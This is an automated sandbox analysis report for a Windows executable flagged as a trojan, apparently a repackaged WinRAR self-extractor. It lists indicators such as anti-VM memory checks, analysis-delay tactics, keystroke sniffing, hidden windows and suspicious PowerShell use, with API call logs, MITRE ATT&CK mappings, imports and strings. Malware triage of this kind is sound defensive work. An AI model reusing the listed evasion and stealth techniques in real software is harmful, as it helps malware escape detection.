SecondWrite DeepView - d590e543b70f2a94028931c414108c2282af7de162659d3978460b0adf3765a7

Malicious

This predictive confidence of maliciousness for this sample is 98%.

d590e543b70f2a94028931c414108c2282af7de162659d3978460b0adf3765a7

443.1 kB

Size

2020-10-27 10:08:40

First seen 45 days ago

Windows PE32 Executable

Classification

Full Detail

Ransomware

Low

Trojan

High

Virus

Low

Banker

Low

Bot

Low

Rat

Low

Adware

Low

Infostealer

Low

Worm

Low

Spyware

Low

Indicators

Expand All

DeepView™ Indicators

Forced Code Execution

Automatic Sequence Detection

Program Level Indicators

Anti-Analysis

Attempts to repeatedly call a single API many times in order to delay analysis time

Anti-Sandbox

A process attempted to delay the analysis task.

Anti-Vm

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available

PID	API	Arguments
2644	GlobalMemoryStatusEx	N/A
2644	GlobalMemoryStatusEx	N/A
2644	GlobalMemoryStatusEx	N/A
2644	GlobalMemoryStatusEx	N/A
2644	GlobalMemoryStatusEx	N/A
2644	GlobalMemoryStatusEx	N/A
2644	GlobalMemoryStatusEx	N/A
2644	GlobalMemoryStatusEx	N/A
2644	GlobalMemoryStatusEx	N/A

Checks adapter addresses which can be used to detect virtual network interfaces

PID	API	Arguments
2644	GetAdaptersAddresses	flags: 15 family: 0
2644	GetAdaptersAddresses	flags: 15 family: 0
2644	GetAdaptersAddresses	flags: 640 family: 0
2644	GetAdaptersAddresses	flags: 640 family: 0
2644	GetAdaptersAddresses	flags: 0 family: 0
2644	GetAdaptersAddresses	flags: 0 family: 0
2644	GetAdaptersAddresses	flags: 46 family: 0
2644	GetAdaptersAddresses	flags: 46 family: 0

Av-Tools

This sample is detected by clamav as: Win.Malware.Smdd-6922230-0

Downloader

Creates a suspicious Powershell process

Generic

This executable has a PDB path

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Creates executable files on the filesystem

Reads data out of its own binary image

Sniffs keystrokes

Attempts to execute a powershell command with suspicious parameter/s

Hooking

Installs an hook procedure to monitor for mouse events

PID	API	Arguments
160	SetWindowsHookExW	thread_identifier: 760 callback_function: 0x766a3e83 hook_identifier: 7 module_address: 0x00000000

Http

HTTP traffic contains suspicious features which may be indicative of malware related traffic

Network

Sample contacts servers at uncommon ports

Packer

The executable has PE anomalies (could be a false positive)

Allocates read-write-execute memory (usually to unpack itself)

PID	API	Arguments
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 1048576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 base_address: 0x02910000 allocation_type: 8192 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x029d0000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtProtectVirtualMemory	process_identifier: 2644 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 base_address: 0x79e71000 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x0252a000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtProtectVirtualMemory	process_identifier: 2644 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 base_address: 0x79e72000 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x02522000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x025b2000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x029d1000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x029d2000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x025da000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x025b3000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x025b4000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x025eb000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x025e7000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x0252b000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x025d2000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x025e5000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x025b5000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x025dc000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x050e0000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x02523000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x025b6000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x025ec000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x025d3000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x025d4000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x025d5000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x025d6000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x025d7000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x025d8000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x025d9000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x05120000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x05121000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x05122000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x05123000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x05124000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x05125000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x05126000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x05127000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x05128000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x05129000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x0512a000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x0512b000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x0512c000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x0512d000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x0512e000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x0512f000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x05130000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x05131000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x05132000 allocation_type: 4096 process_handle: 0xffffffff
2644	NtAllocateVirtualMemory	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 base_address: 0x05133000 allocation_type: 4096 process_handle: 0xffffffff

Creates a suspicious process

Program-Level-Features

More than %50 of the external calls do not go through the import address table

Recon

Queries for the computername

PID	API	Arguments
2644	GetComputerNameW	computer_name: VIRTUAL-PC
2644	GetComputerNameW	computer_name: VIRTUAL-PC
2644	GetComputerNameW	computer_name: VIRTUAL-PC
2644	GetComputerNameW	computer_name: VIRTUAL-PC
2644	GetComputerNameA	computer_name: VIRTUAL-PC
2644	GetComputerNameW	computer_name: VIRTUAL-PC
2644	GetComputerNameW	computer_name: VIRTUAL-PC

Static

Strings possibly contain hardcoded URLs

Stealth

A process created a hidden window

Creates a hidden or system file

Yara

Yara Pattern Name	Description
CRC32_poly_Constant	Look for CRC32 [poly]
RIPEMD160_Constants	Look for RIPEMD-160 constants
SHA1_Constants	Look for SHA1 constants
IsPE32	No Description Available
HasOverlay	Overlay Check
HasDebugData	DebugData Check
HasRichSignature	Rich Signature Check
anti_dbg	Checks if being debugged
escalate_priv	Escalade priviledges
screenshot	Take screenshot
win_registry	Affect system registries
win_token	Affect system token
win_files_operation	Affect private profile

MITRE ATT&CK^®

Show ID

Enterprise Matrix (Tactics and Techniques)

Initial Access TA0001

Execution TA0002

Scripting T1064

Persistence TA0003

Hidden Files and Directories T1158

Privilege Escalation TA0004

Defense Evasion TA0005

Software Packing T1045

Virtualization / Sandbox Evasion T1497

Hidden Window T1143

Scripting T1064

Hidden Files and Directories T1158

Credential Access TA0006

Credential Dumping T1003

Discovery TA0007

Virtualization / Sandbox Evasion T1497

Lateral Movement TA0008

Collection TA0009

Command and Control TA0011

Uncommonly Used Port T1065

Commonly Used Port T1043

Custom Command and Control Protocol T1094

Exfiltration TA0010

Impact TA0040

Static Analysis

Sections

Name	Virtual Address	Virtual Size	Size of Raw Data	Entropy
.text	0x00001000	0x00030f2a	0x00031000	6.70442014047
.rdata	0x00032000	0x0000a5f2	0x0000a600	5.25929700377
.data	0x0003d000	0x00023720	0x00001000	3.70567903528
.didat	0x00061000	0x00000188	0x00000200	3.29950886768
.rsrc	0x00062000	0x0002cfd7	0x0002d000	3.26732824769
.reloc	0x0008f000	0x00002264	0x00002400	6.55674694766

Resources

Name	Offset	Size	Language	Sub-language	File type
PNG	0x000631ec	0x000015a9	LANG_ENGLISH	SUBLANG_ENGLISH_US	None
PNG	0x000631ec	0x000015a9	LANG_ENGLISH	SUBLANG_ENGLISH_US	None
RT_ICON	0x0008c7d8	0x00000468	LANG_ENGLISH	SUBLANG_ENGLISH_US	None
RT_ICON	0x0008c7d8	0x00000468	LANG_ENGLISH	SUBLANG_ENGLISH_US	None
RT_ICON	0x0008c7d8	0x00000468	LANG_ENGLISH	SUBLANG_ENGLISH_US	None
RT_ICON	0x0008c7d8	0x00000468	LANG_ENGLISH	SUBLANG_ENGLISH_US	None
RT_ICON	0x0008c7d8	0x00000468	LANG_ENGLISH	SUBLANG_ENGLISH_US	None
RT_ICON	0x0008c7d8	0x00000468	LANG_ENGLISH	SUBLANG_ENGLISH_US	None
RT_ICON	0x0008c7d8	0x00000468	LANG_ENGLISH	SUBLANG_ENGLISH_US	None
RT_ICON	0x0008c7d8	0x00000468	LANG_ENGLISH	SUBLANG_ENGLISH_US	None
RT_ICON	0x0008c7d8	0x00000468	LANG_ENGLISH	SUBLANG_ENGLISH_US	None
RT_DIALOG	0x0008d558	0x00000252	LANG_ENGLISH	SUBLANG_ENGLISH_US	None
RT_DIALOG	0x0008d558	0x00000252	LANG_ENGLISH	SUBLANG_ENGLISH_US	None
RT_DIALOG	0x0008d558	0x00000252	LANG_ENGLISH	SUBLANG_ENGLISH_US	None
RT_DIALOG	0x0008d558	0x00000252	LANG_ENGLISH	SUBLANG_ENGLISH_US	None
RT_DIALOG	0x0008d558	0x00000252	LANG_ENGLISH	SUBLANG_ENGLISH_US	None
RT_DIALOG	0x0008d558	0x00000252	LANG_ENGLISH	SUBLANG_ENGLISH_US	None
RT_STRING	0x0008e728	0x000000d6	LANG_ENGLISH	SUBLANG_ENGLISH_US	None
RT_STRING	0x0008e728	0x000000d6	LANG_ENGLISH	SUBLANG_ENGLISH_US	None
RT_STRING	0x0008e728	0x000000d6	LANG_ENGLISH	SUBLANG_ENGLISH_US	None
RT_STRING	0x0008e728	0x000000d6	LANG_ENGLISH	SUBLANG_ENGLISH_US	None
RT_STRING	0x0008e728	0x000000d6	LANG_ENGLISH	SUBLANG_ENGLISH_US	None
RT_STRING	0x0008e728	0x000000d6	LANG_ENGLISH	SUBLANG_ENGLISH_US	None
RT_STRING	0x0008e728	0x000000d6	LANG_ENGLISH	SUBLANG_ENGLISH_US	None
RT_STRING	0x0008e728	0x000000d6	LANG_ENGLISH	SUBLANG_ENGLISH_US	None
RT_STRING	0x0008e728	0x000000d6	LANG_ENGLISH	SUBLANG_ENGLISH_US	None
RT_STRING	0x0008e728	0x000000d6	LANG_ENGLISH	SUBLANG_ENGLISH_US	None
RT_GROUP_ICON	0x0008e800	0x00000084	LANG_ENGLISH	SUBLANG_ENGLISH_US	None
RT_MANIFEST	0x0008e884	0x00000753	LANG_ENGLISH	SUBLANG_ENGLISH_US	None

Imports

Library KERNEL32.dll:

AllocConsole
AttachConsole
CloseHandle
CompareStringW
CreateDirectoryW
CreateEventW
CreateFileMappingW
CreateFileW
CreateHardLinkW
CreateSemaphoreW
CreateThread
DecodePointer
DeleteCriticalSection
DeleteFileW
DeviceIoControl
EncodePointer
EnterCriticalSection
ExitProcess
ExpandEnvironmentStringsW
FileTimeToLocalFileTime
FileTimeToSystemTime
FindClose
FindFirstFileExA
FindFirstFileW
FindNextFileA
FindNextFileW
FindResourceW
FlushFileBuffers
FoldStringW
FormatMessageW
FreeConsole
FreeEnvironmentStringsW
FreeLibrary
GetACP
GetCommandLineA
GetCommandLineW
GetConsoleCP
GetConsoleMode
GetCPInfo
GetCurrentDirectoryW
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetDateFormatW
GetEnvironmentStringsW
GetExitCodeProcess
GetFileAttributesW
GetFileType
GetFullPathNameW
GetLastError
GetLocaleInfoW
GetLocalTime
GetLongPathNameW
GetModuleFileNameA
GetModuleFileNameW
GetModuleHandleExW
GetModuleHandleW
GetNumberFormatW
GetOEMCP
GetProcAddress
GetProcessAffinityMask
GetProcessHeap
GetShortPathNameW
GetStartupInfoW
GetStdHandle
GetStringTypeW
GetSystemDirectoryW
GetSystemInfo
GetSystemTime
GetSystemTimeAsFileTime
GetTempPathW
GetTickCount
GetTimeFormatW
GetVersionExW
GlobalAlloc
GlobalFree
GlobalLock
GlobalUnlock
HeapAlloc
HeapFree
HeapReAlloc
HeapSize
InitializeCriticalSection
InitializeCriticalSectionAndSpinCount
InitializeSListHead
IsDBCSLeadByte
IsDebuggerPresent
IsProcessorFeaturePresent
IsValidCodePage
LCMapStringW
LeaveCriticalSection
LoadLibraryExA
LoadLibraryExW
LoadLibraryW
LoadResource
LocalFileTimeToFileTime
LockResource
MapViewOfFile
MoveFileExW
MoveFileW
MultiByteToWideChar
OpenFileMappingW
QueryPerformanceCounter
QueryPerformanceFrequency
RaiseException
ReadFile
ReleaseSemaphore
RemoveDirectoryW
ResetEvent
RtlUnwind
SetCurrentDirectoryW
SetEndOfFile
SetEnvironmentVariableW
SetEvent
SetFileAttributesW
SetFilePointer
SetFilePointerEx
SetFileTime
SetLastError
SetStdHandle
SetThreadExecutionState
SetThreadPriority
SetUnhandledExceptionFilter
SizeofResource
Sleep
SystemTimeToFileTime
SystemTimeToTzSpecificLocalTime
TerminateProcess
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
TzSpecificLocalTimeToSystemTime
UnhandledExceptionFilter
UnmapViewOfFile
VirtualProtect
VirtualQuery
WaitForSingleObject
WideCharToMultiByte
WriteConsoleW
WriteFile

Library gdiplus.dll:

GdipAlloc
GdipCloneImage
GdipCreateBitmapFromStream
GdipCreateBitmapFromStreamICM
GdipCreateHBITMAPFromBitmap
GdipDisposeImage
GdipFree
GdiplusShutdown
GdiplusStartup

Strings

!This program cannot be run in DOS mode.
`.rdata
@.data
.didat
@.reloc
f90tCSj\Zj_[f9
t,PhT&C
v'Ph\&C
~(h0&C
PPu[j}
t(Ph@&C
E`_^[d
\$ +|$ !t$
T$$9t$
t,j.Xj\f
_^][YY
QSVWh`a@
u'SSSS
UVWj@_;
ulWj@X;
l$$VW3
uUf9.u
u&hh'C
QQSUVW
f9t^j.
_^][YY
t:j_[f9^
u*8W_t
jPXf9E
_^][YY
QQSUVW
9\$ vN
tOhT(C
j\Zf9TF
f9u)f9_
j.[]f9
WVj\^f97uMf9w
v9Uj.]
t=j ]f;
1j\Yf9
_^][YY
f9.t[S
uDj0]j.Z;
|$,;|$8
L$,;L$8
_^][YY
W9u tp
9~,v'S
YY;~,r
jPhX)C
SVWj\XP
YY9^,v
Aj Xf9
D$`jPP
L$4+L$,
t$8A+t$0
t$DVSj
jd^+L$4
|$,Pjd
D$H3E$3u
3T$\3t$`3\$d3D$h
D$$3L$,
|$Xj8[
?vUUj@^+
vzj@[+
t9Uj@]+
\$|AUV3
PSSSSSSh
SUVWh`+C
tdht+C
D$( ,C
D$,8,C
D$0P,C
D$4l,C
D$8|,C
D$X4-C
D$\D-C
D$``-C
D$dx-C
rfh8,C
u'h(2C
L$$+D$
9t$ vL
_^][YY
QQSUVW
_^][YY
D$$SUV
!N|+F|#
s2;V|t-
to9.uk
t$09KP
D$(PtW
t$0;sP
L$09KPvG
s?;N|t:
T$$;l$
;L$ |3;
s2;N|t-
F|9\$$sP
t`f9+tN
D$(PjE
tJ9o uE9o
V,]^[Y
ZuDf9V
,__f9~
v&j Yf;
4Sh|CC
tSf;L$
D$,+D$$PV
tJ9s uE9s
VQh,DC
][_^YY
D$,UPj
@PWhLDC
N Wh\DC
D$`XWWf
$SUVWj
t;VWj\_
ubhhtD
j"Zj,2
UUh|@C
t$,SVW
f98t=V
D$$PUh
D$$PUV
.u'f9O
PShtBC
Yj\Yf9
YYj"[f9
tfj"]f9+u
f9(tSVWS
Uj"]f;
Cf9,Ft
WShx[E
tGWSSVU
t-WShx[E
D$|Ph4@C
D$0hH@C
QQSVWd
URPQQh`.B
;t$,v-
UQPXY]Y[
Tt1jhZ;
^$+^8+
t0jXXf
~$+~8+
F2jgYf;
u0jAXf;
u0jAXf;
t#VhdOC
Wj0XPV
PPPPPWS
PP9E u:PPVWP
TVh8cC
WWWPWS
u-PWWS
SSVWh
f9:t!V
QQSWj0j@
PPPPPPPP
*messages***
CryptProtectMemory
CryptUnprotectMemory
xlistpos
SetDllDirectoryW
SetDefaultDllDirectories
Unknown exception
bad allocation
s:IDS_BROWSETITLE
s:IDS_CMDEXTRACTING
s:IDS_SKIPPING
s:IDS_UNEXPEOF
s:IDS_FILEHEADERBROKEN
s:IDS_HEADERBROKEN
s:IDS_MAINHEADERBROKEN
s:IDS_CMTHEADERBROKEN
s:IDS_CMTBROKEN
s:IDS_OUTOFMEMORYERROR
s:IDS_UNKNOWNMETHOD
s:IDS_CANNOTOPEN
s:IDS_CANNOTCREATE
s:IDS_CANNOTMKDIR
s:IDS_ENCRCRCFAILED
s:IDS_EXTRCRCFAILED
s:IDS_PACKEDDATACRCFAILED
s:IDS_WRITEERROR
s:IDS_READERROR
s:IDS_CLOSEERROR
s:IDS_CANNOTFINDVOL
s:IDS_BADARCHIVE
s:IDS_EXTRACTING
s:IDS_ASKNEXTVOLTITLE
s:IDS_ARCHEADERBROKEN
s:IDS_DONE
s:IDS_ERROR
s:IDS_ERRORS
s:IDS_BYTES
s:IDS_MODIFIEDON
s:IDS_BADFOLDER
s:IDS_CREATEERRORS
s:IDS_CRCERRORS
s:IDS_ALLFILES
s:IDS_TITLE1
s:IDS_TITLE1A
s:IDS_TITLE2
s:IDS_TITLE3
s:IDS_TITLE4
s:IDS_TITLE5
s:IDS_TITLE6
s:IDS_ARCBROKEN
s:IDS_EXTRFILESTO
s:IDS_EXTRFILESTOTEMP
s:IDS_EXTRACTBUTTON
s:IDS_EXTRACTPROGRESS
s:IDS_MAXPATHLIMIT
s:IDS_UNKENCMETHOD
s:IDS_WRONGPASSWORD
s:IDS_WRONGFILEPASSWORD
s:IDS_COPYERROR
s:IDS_CANNOTCREATELNKS
s:IDS_CANNOTCREATELNKH
s:IDS_ERRLNKTARGET
s:IDS_NEEDADMIN
s:IDS_PAUSE
s:IDS_CONTINUE
s:IDS_SECWARNING
s:IDS_SECDELDLL
$STARTDLG:SIZE
$STARTDLG:CAPTION
$STARTDLG:IDC_DESTEDITTITLE
$STARTDLG:IDC_CHANGEDIR
$STARTDLG:IDC_PROGRESSBARTITLE
$STARTDLG:IDOK
$STARTDLG:IDCANCEL
$REPLACEFILEDLG:SIZE
$REPLACEFILEDLG:CAPTION
$REPLACEFILEDLG:IDC_OWRFILEEXISTS
$REPLACEFILEDLG:IDC_OWRASKREPLACE
$REPLACEFILEDLG:IDC_OWRQUESTION
$REPLACEFILEDLG:IDC_OWRYES
$REPLACEFILEDLG:IDC_OWRALL
$REPLACEFILEDLG:IDC_OWRRENAME
$REPLACEFILEDLG:IDC_OWRNO
$REPLACEFILEDLG:IDC_OWRNOALL
$REPLACEFILEDLG:IDC_OWRCANCEL
$RENAMEDLG:SIZE
$RENAMEDLG:CAPTION
$RENAMEDLG:IDOK
$RENAMEDLG:IDCANCEL
$RENAMEDLG:IDC_RENAMEFROM
$RENAMEDLG:IDC_RENAMETO
$GETPASSWORD1:SIZE
$GETPASSWORD1:CAPTION
$GETPASSWORD1:IDC_PASSWORDENTER
$GETPASSWORD1:IDOK
$GETPASSWORD1:IDCANCEL
$LICENSEDLG:SIZE
$LICENSEDLG:CAPTION
$LICENSEDLG:IDOK
$LICENSEDLG:IDCANCEL
$ASKNEXTVOL:SIZE
$ASKNEXTVOL:CAPTION
$ASKNEXTVOL:IDC_NEXTVOLINFO1
$ASKNEXTVOL:IDC_NEXTVOLFIND
$ASKNEXTVOL:IDC_NEXTVOLINFO2
$ASKNEXTVOL:IDOK
$ASKNEXTVOL:IDCANCEL
USER32.dll
GDI32.dll
COMDLG32.dll
ADVAPI32.dll
SHELL32.dll
ole32.dll
AcquireSRWLockExclusive
ReleaseSRWLockExclusive
SHLWAPI.dll
COMCTL32.dll
bad array new length
bad exception
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
`h````
xpxxxx
(null)
CorExitProcess
NAN(SNAN)
nan(snan)
NAN(IND)
nan(ind)
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
GetCurrentPackageId
LCMapStringEx
LocaleNameToLCID
[aOni*{
~ $s%r
@b;zO]
v2!L.2
1#QNAN
1#SNAN
?5Wg4p
%S#[k=
"B <1=
_hypot
_nextafter
RSDSP(
D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb
.text$di
.text$mn
.text$x
